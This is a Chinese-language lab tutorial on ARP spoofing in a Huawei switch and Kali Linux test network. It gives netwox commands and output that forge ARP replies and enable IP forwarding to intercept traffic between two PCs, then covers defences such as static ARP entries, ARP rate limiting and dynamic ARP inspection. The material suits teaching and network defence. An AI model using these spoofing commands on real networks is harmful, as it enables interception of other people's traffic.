协议栈安全--ARP欺骗攻击

TCP/IP 协议栈所存的安全问题

TCP/IP协议栈安全

• 物理层 ：设备破坏、线路的侦听
• 数据链路层 ：MAC地址欺骗、arp欺骗、MAC地址表堵塞攻击
• 网络层：ip地址欺骗、泪滴攻击、ICMP攻击、死亡之ping、地址扫描、smurf攻击
• 传输层 ：TCP欺骗、TCP拒绝服务攻击、UDP拒绝服务攻击、端口扫描、TCP劫
• 应用层：漏洞、缓冲区溢出、WEB应用攻击、木马、病毒、蠕虫。。。

一、案例拓扑

攻击原理：
ARP 欺骗攻击，是黑客通过伪造正常的ARP，使得被攻击者主机ARP表中IP与MAC地址的映射关系覆盖原有正确的信息。
其中通过修改数据包的源MAC ，导致被攻击者主机生成的ARP表，目标所对应的主机MAC成为了黑客的主机。
最终被攻击主机发往目标主机的所有数据包都要经过黑客主机，然后经过黑客主机的开启路由转发功能再次将数据包转发给目标主机，才完成数据的传输。
从而导致，传输的所有数据被窃取。
注意：ARP表生成过程中，没有认证机制，往往会将最新的映射关系加入到表中

环境介绍：

• 华为 5700 交换机，PC 两台，华为云一台
• 基于kali 系统的 netwox 工具
  （kali 系统和华为云 同时 桥接到 mv net 8网站卡上，PC和 kali 系统通过Vmware 的 DHCP 分配地址通过DHCP 分配地址）

二、攻击过程

1、准备工作

netwox 工具使用参数：

kali@kali:~$ sudo su root
[sudo] kali 的密码：
root@kali:/home/kali#
root@kali:/home/kali# netwox 33 --help
Title: Spoof EthernetArp packet
Usage: netwox 33 [-d device] [-a eth] [-b eth] [-c uint32] [-e uint32] [-f eth] [-g ip] [-h eth] [-i ip]
Parameters:
-d|–device device device for spoof {Eth0}
-a|–eth-src eth Ethernet src {00:0C:29:30:2D:1C}
-b|–eth-dst eth Ethernet dst {0:8:9: a :b :c}
-c|–eth-type uint32 Ethernet type : ARP=2054, RARP=32821 {2054}
-e|–arp-op uint32 ARP op : 1=ARPREQ, 2=ARPREP, 3=RARPREQ, 4=RARPREP {1}
-f|–arp-ethsrc eth ARP ethsrc {00:0C:29:30:2D:1C}
-g|–arp-ipsrc ip ARP ipsrc {0.0.0.0}
-h|–arp-ethdst eth ARP ethdst {0:0:0:0:0:0}
-i|–arp-ipdst ip ARP ipdst {0.0.0.0}
–help2 display full help
Example: netwox 33

开启攻击者kali的网卡转发功能

开启了网卡转发受害主机发送到目标主机的数据包回经过攻击者主机转发出去，这样攻击者就获得了受 害主机的通讯数据

 vim /etc/sysctl.conf   //编辑sysctl.conf 
 net.ipv4.ip_forward = 1  //设置为1 
 sysctl -p /etc/sysctl.conf  //立即生效不需要重启 
 cat /proc/sys/net/ipv4/ip_forward //查看值是否为1，为1表示修改完成，为0表示没有修改

攻击之前

2、kali 系统伪造 ARP 数据包

#攻击PC1
root@kali:/home/kali#  netwox 33 -b 54:89:98:76:5D:71 -c 2054 -e 2 -g 192.168.5.9 -h 54:89:98:76:5D:71 -i 192.168.5.10
Ethernet________________________________________________________.
| 00:0C:29:30:2D:1C->54:89:98:76:5D:71 type:0x0806              |
|_______________________________________________________________|
ARP Reply_______________________________________________________.
| this answer : 00:0C:29:30:2D:1C 192.168.5.9                   |
| is for      : 54:89:98:76:5D:71 192.168.5.10                  |
|_______________________________________________________________|
#攻击PC2
root@kali:/home/kali# netwox 33 -b 54:89:98:30:60:10 -c 2054 -e 2 -g 192.168.5.10 -h 54:89:98:76:5D:71 -i 192.168.5.9
Ethernet________________________________________________________.
| 00:0C:29:30:2D:1C->54:89:98:30:60:10 type:0x0806              |
|_______________________________________________________________|
ARP Reply_______________________________________________________.
| this answer : 00:0C:29:30:2D:1C 192.168.5.10                  |
| is for      : 54:89:98:76:5D:71 192.168.5.9                   |
|_______________________________________________________________|

查看 PC1 的 ARP 表

查看 PC2 的 ARP 表

三、测试

PC1–>PC2：

PC2–>PC1：

关闭交换机接口 g0/0/3

<Huawei>system-view 
Enter system view, return user view with Ctrl+Z.
[Huawei]interface g0/0/3	
[Huawei-GigabitEthernet0/0/3]shutdown 

PC1–>PC2：

PC2–>PC1：

四、ARP欺骗攻击的防御

1、ARP没有认证机制，围绕信任名单做防御机制

• 通过人工添加ARP静态表项

arp -s 157.55.85.212   00-aa-00-62-c6-09.... 添加静态项

• 通过软件检测ARP表项构建信任ARP表，将非信任ARP信息或者异常ARP包丢弃掉
  ----通过软件实现

2、交换机防御技术

• 再交换机上对ARP数据包数量做限制

#基于源IP限制ARP数量
[Huawei]arp speed-limit source-ip 192.168.5.8 maximum 5
#基于源MAC限制ARP数量
[Huawei]arp speed-limit source-mac 000c-2930-2d1c maximum 5

#开启ARP限速功能
netwox 33 -b 54:89:98:30:60:10 -c 2054 -e 2 -g 192.168.5.10 -h 54:89:98:76:5D:71 -i 192.168.5.9
#限定ARP限速阈值--每10s发送一个包
[Huawei]arp anti-attack rate-limit 1 10

• DAI – dynamic inspection 动态ARP检测技术

交换机收集信息构建一个基于 mac-ip-接口-vlan 的映射表，然后检测各个端口发出的arp报文，把arp报文中的记录的mac与ip映射关系和它自己构建的映射表进行对比，如果对比失败则丢弃该arp报文

（1）协议构建
dhcp snooping 构建dhcp snooping bingding表
（2）人工构建

[Huawei]arp dhcp-snooping-detect enable
[Huawei]arp static 192.168.5.10 5489-9876-5D71 vid 1 interface GigabitEthernet 0
/0/1

参考文档
DAI
配置ARP表项固化